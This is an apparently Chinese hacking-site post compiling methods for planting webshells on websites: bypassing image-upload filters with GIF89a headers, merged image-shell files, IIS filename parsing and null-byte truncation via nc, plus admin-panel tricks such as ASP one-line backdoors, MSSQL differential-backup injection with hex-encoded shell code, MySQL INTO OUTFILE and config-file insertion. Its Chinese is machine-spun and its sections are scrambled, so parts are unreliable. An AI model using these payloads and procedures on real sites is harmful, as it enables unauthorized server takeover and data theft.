几种上传图片shell绕过过滤的方法加后台拿shell的一些技巧总结

  • 内容
  • 相关
1、文件头+GIF89a法。(php)//这个极好了解,直接在php马最前面写入gif89a,然后上载dama.php

 

2、运用edjpgcom东西向图像写入代码。(php)//edjpgcom修正,参加php一句话保存为dama.php

 

3、cmd指令下copy 图像.GIF+shell.php webshell.php (php) //估量和1是相同的原理,诈骗上载webshell.php

 

4、C32asm翻开图像在文件末尾空一格参加代码 。(php)//填充php一句话然后上载。

 

5、在4基础上改善代码")?> 。(php)//同

目录下生成error.php,发问:asp的怎样改写?

答复:asp测验的结果是:没有权限...

<%

Set MyFileObject=Server.CreateObject("Scripting.FileSystemObject")

Set MyTextFile=MyFileObject.CreateTextFile("kafei.asp")

MyTextFile.WriteLine("\<\%eval request(chr(35))\%\>")

MyTextFile.Close

%>


 

6、IIS解析目录名缝隙1.php;.jpg (jpg) //这是文件名变量没有过滤。

 

7、nc抓包改数据 //途径名和文件名没有过滤。

//经过抓包修正上载途径经过/upload/1.asp+空格,运用软件把空格填充为00。然后nc提交获取webshell。

.


1、所以本地建了一个MDB数据库,写入
┼攠數畣整爠煥敵瑳∨≡┩愾
2、然后改为ASP上载,一句话木马上载成功了,再拿客户端去连的时分,出来了一流监控体系的提示
估量前面的SHELL为空也是这东西搞的。。
所以先将自个的SHELL用微软的screnc.exe进行加密。
3、然后新建一个很小的图像。
在CMD下面copy /b a.jpg+shell.asp rs.asp
运用二进制的办法将两个文件兼并在一起。 这次再上载,成功了,没有被那个监控体系挡下来。
4、可是这时的SHELL要在FIREFOX下面才能够浏览,放到IE下面的话只会的到一张图像,而看不到SHELL 。
因为前面将SHELL与图像兼并在一起了,所以这时的SHELL里边有许多乱码,这时运用SHELL的长途文件下载功用。
因为一流监控体系只会对向上载的数据进行检查,对服务器下载的数据并不会进行检查。
将一个洁净的SHELL下载到服务器上就行,先将SHELL存为TXT文件然后传到自个的服务器上,然后再运用SHELL供给的长途文件下载功用将那个TXT文件下载到服务器上面存为ASP,这么就拿到了一个洁净的SHELL。

================================================

上载缝隙首要即是运用'\0'字符缝隙,'\0'字符在体系中被用作字符串完毕的象征
基本原理即是网络程序尽管制止了.asp等后缀名文件的上载,可是都会答应.jpg或许.gif格式文件的上载。
这么假如自个结构数据包 formPath=UploadFile/shell.asp'\0 '.jpg,那么'\0 '后边的字符将被切断,原因是计算机遇到'\0'字符,以为字符串完毕了。所以咱们就向服务器上载了一个名为shell.asp的ASP木马程序,后边的就不多说了,webshell的功用现已很强壮了,假如再合作Serv-U取得server的管理员权限...

 


侵略进程:
条件:需求最少NC、WinSock Expert、UltraEdit三个东西和一个webshell程序
nc.exe(netcat) - 一个变形了的telnet,嗅探器,网络安全届的军刀!
WinSock Expert - 抓包东西,能够截获网络通讯的数据流
UltraEdit - ......不说了,无人不知无人不晓-_-!
webshell - ASP、PHP等木马程序

 


1.第一步,翻开方针体系的上载页面,经过WinSock Expert监督,上载webshell.asp文件,再翻开WinSock Expert,将截获的数据流存为文这篇文章件
(两个send下面的一切内容,包含回车产生的空白行)

 


2.经过UltraEdit修正文这篇文章件中的要害代码:filename="C:\test\webshell.asp" ,webshell.asp后加:1个空格及.jpg,然后跳到16进制修正状况,修正16进制下空格的20为00,Content-Length长度增加5。(一个字符算一个字节,' .jpg'一个5个字节)

 


3.nc进场~!^^
指令:nc -vv www.xxx.com 80 < 1.txt

后台拿web shell全集

一、直接上载取得webshell 
这种对php和jsp的一些程序对比多见,MolyX BOARD即是其间一例,直接在心境图标管理上载.php类型,尽管没有提示,本来现已成功了,上载的文件url应该是http://forums/images/smiles/下,前一阵子的联众游戏站和网易的jsp体系缝隙就能够直接上载jsp文件。文件名是原来的文件名,bo-blog后台能够能够直接上载.php文件,上载的文件途径有提示。以及一年前非常盛行的upfile.asp缝隙(动网5.0和6.0、前期的许多整站体系),因过滤上载文件不严,致运用户能够直接上载webshell到网站恣意可写目录中,然后拿到网站的管理员操控权限。 
二、增加修正上载类型 
如今许多的脚本程序上载模块不是只答应上载合法文件类型,而大多数的体系是答应增加上载类型,bbsxp后台能够增加asa asP类型,ewebeditor的后台也可增加asa类型,经过修正后咱们能够直接上载asa后缀的webshell了,还有一种情况是过滤了.asp,能够增加.aspasp的文件类型来上载取得webshell。php体系的后台,咱们能够增加.php.g1f的上载类型,这是php的一个特性,最终的哪个只需不是已知的文件类型即可,php会将php.g1f作为.php来正常运转,然后也可成功拿到shell。LeadBbs3.14后台取得webshell办法是:在上载类型中增加asp ,留意,asp后边是有个空格的,然后在前台上载ASP马,当然也要在后边加个空格! 七、asp+mssql体系 
这儿需求提一点动网mssql版,可是能够直接本地提交来备份的。首先在发帖那上载一个写有asp代码的假图像,然跋文住其上载途径。写一个本地提交的表单,代码如下: 
<form act ion=http://网站/bbs/admin_data.asp?ac tion=RestoreData&act=Restore method="post"> 
<p>已上载文件的方位:<input name="Dbpath" type="text" size="80"></p> 
<p>要复制到的方位:<input name="backpath" type="text" size="80"></p> 
<p><input type="submit" value="提交"></p> </form> 
另存为.htm本地履行。把假图像上载途径填在“已上载文件的方位”那里,想要备份的WebShell的相对途径填写在“要复制到的方位”那里,提交就得到咱们心爱的WebShell了,康复代码和此相似,修正有关当地就能够了。没有遇到过后台履行mssql指令对比强壮的asp程序后台,动网的数据库复原和备份是个铺排,不能履行sql指令备份webshell,只能履行一些简单的查询指令。能够运用mssql写入区别备份webshell,通常后台是显现了绝对途径,只需有了写入点基本上就能够区别备份成功。下面是区别备份的首要句子代码,运用动网7.0的写入缝隙能够用区别备份一个webshell,能够用运用上面说到的办法,将conn.asp文件备份成.txt文件而取得库名。 
区别备份的首要代码: 
;declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x626273 backup database @a to disk=@s-- 
;Drop table [heige];create table [dbo].[heige] ([cmd] [image])-- 
;insert into heige(cmd) values(0x3C2565786563757465207265717565737428226C2229253E)-- 
;declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x643A5C7765625C312E617370 backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT-- 
这段代码中,0x626273是要备份的库名bbs的十六进制,能够是别的名字比如bbs.bak; 0x3C2565786563757465207265717565737428226C2229253E是<%execute request("l")%>的十六进制,是lp最小马;0x643A5C7765625C312E617370是d:\web\1.asp的十六进制,也即是你要备份的webshell途径。当然也能够用对比多见备份办法来取得webshell,仅有的不足即是备份后的文件过大,假如备份数据库中有防下载的的数据表,或许有过错的asp代码,备份出来的webshell就不会成功运转,运用区别备份是成功率对比高的办法,而且极大的削减备份文件的巨细。 
八、php+mysql体系 
后台需求有mysql数据查询功用,咱们就能够运用它履行SELECT ... INTO OUTFILE查询输出php文件,因为一切的数据是存放在mysql里的,所以咱们能够经过正常手法把咱们的webshell代码刺进mysql在运用SELECT ... INTO OUTFILE句子导出shell。 
就能够暴出途径,php环境中对比简单暴出绝对途径:)。提一点的是遇到是mysql在win体系下途径应该这么写。下面的办法是对比常用的一个导出webshell的办法,也能够写个vbs增加体系管理员的脚本导出到发动文件夹,体系重起后就会增加一个管理员帐号 
就会在up目录下生成文件名为saiy.php内容为的最小php木马, 最终用lanker的客户端来衔接。实践运用中要考虑到文件夹是不是有写权限。或许输入这么的代码 将会在当时目录生成一个a.php的最小马。 
九、phpwind论坛从后台到webshell的三种办法 
办法1 模板法 
进入后台, 个性模版设置 ,在随意一行写代码,记住,这代码必须顶着左面行写,代码前面不能够有任何字符。 
方始2 脏话过滤法 
办法3 用户等级管理 
以上三种办法得到webshellr的暗码是a,为lanker的一句话后门服务端。 
十、也能够运用网站拜访计数体系记录来取得webshell 
解决方案 
因为这篇文章涉及的代码版本许多,所以不可能供给一个完美的解决方案。有能力者能够对于这篇文章说到的缝隙文件进行恰当修补,若缝隙文件不影响体系运用也可删去此文件。咱们假如不会修补,能够到有关官方网站下载最新补丁进行修复更新。一起也请咱们能时间重视各大安全网络发布的最新布告,若自个发现有关缝隙也可及时告诉官方网站。 
跋文 
本来,从后台得到webshell的窍门应该还有许多的,要害是要看咱们怎样灵活运用、举一反三,期望这篇文章的办法能起到抛砖引玉的效果。 各位加油吧,让咱们将服务器操控到底! 
三、运用后台管理功用写入webshell 
上载缝隙基本上补的也差不多了,所以咱们进入后台后还能够经过修正有关文件来写入webshell。对比的典型的有dvbbs6.0,还有leadbbs2.88等,直接在后台修正配置文件,写入后缀是asp的文件。而LeadBbs3.14后台取得webshell另一办法是:增加一个新的友谊链接,在网站称号处写上冰狐最小马即可,最小马前后要随意输入一些字 
,http:\\网站\inc\IncHtm\BoardLink.asp即是咱们想要的shell。 
四、运用后台管理向配置文件写webshell 
运用"""":""//"等符号结构最小马写入程序的配置文件,joekoe论坛,某某同学录,欢腾展望新闻体系,COCOON Counter计算程序等等,还有许多php程序都能够,COCOON Counter计算程序举例,在管理邮箱处添上cnhacker@263.net":eval request(chr (35))//, 在配制文件中即是webmail="cnhacker@263.net\":eval request(chr(35))//",还有一种办法即是写上 cnhacker@263.net"%><%eval request(chr(35))%><%’,这么就会构成前后对应,最小马也就运转了。<%eval request(chr(35))%>能够用lake2的eval发送端以及最新的2006 客户端来连,需求阐明的是数据库插马时分要选前者。再如动易2005,到文章基地管理-顶部菜单设置-菜单其它特效,刺进一句话马"%><%execute request("l")%><%’,保 存顶部节目菜单参数设置成功后,咱们就得到马地址http://网站/admin/rootclass_menu_config.asp。 
五、运用后台数据库备份及康复取得webshell 
首要是运用后台对access数据库的“备份数据库”或“康复数据库”功用,“备份的数据库途径”等变量没有过滤致使能够把恣意文件后缀改 为asp,然后得到webshell,msssql版的程序就直接应用了access版的代码,致使sql版照样能够运用。还能够备份网站asp文件为别的后缀 如.txt文件,然后能够检查并取得页面源代码,并取得更多的程序信息增加取得webshell的时机。在实践运用中经常会碰到没有上载功用的时 候,可是有asp体系在运转,运用此办法来检查源代码来取得其数据库的方位,为数据库插马来发明时机,动网论坛就有一个ip地址的数据库,在后台的ip管理中能够刺进最小马然后备份成.asp文件即可。在谈谈打破上载检查的办法,许多asp程序在即便改了后缀名后也会提示文件不合法,经过在.asp文件头加上gif89a修正后缀为gif来骗过asp程序检查到达上载的意图,还有一种即是用记事本翻开图像文件,随意张贴一部分复制到asp木马文件头,修正gif后缀后上载也能够打破检查,然后备份为.asp文件,成功得到webshell。 
六、运用数据库紧缩功用 
能够将数据的防下载失效然后使刺进数据库的最小马成功运转,对比典型的即是loveyuki的L-BLOG,在友谊增加的url出写上<%eval request (chr(35))%>, 提交后,在数据库操作中紧缩数据库,能够成功紧缩出.asp文件,用海洋的最小马的eval客户端连就得到一个webshell。

本文标签:

版权声明:若无特殊注明,本文皆为《颓废》原创,转载请保留文章出处。

收录状态:[百度已收录] | [360未收录] | [搜狗已收录]

本文链接:几种上传图片shell绕过过滤的方法加后台拿shell的一些技巧总结 - https://www.0dayhack.com/post-402.html

严重声明:本站内容来自于互联网,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规,黑客不是骇客,黑客维护网络安全

发表评论

电子邮件地址不会被公开。 必填项已用*标注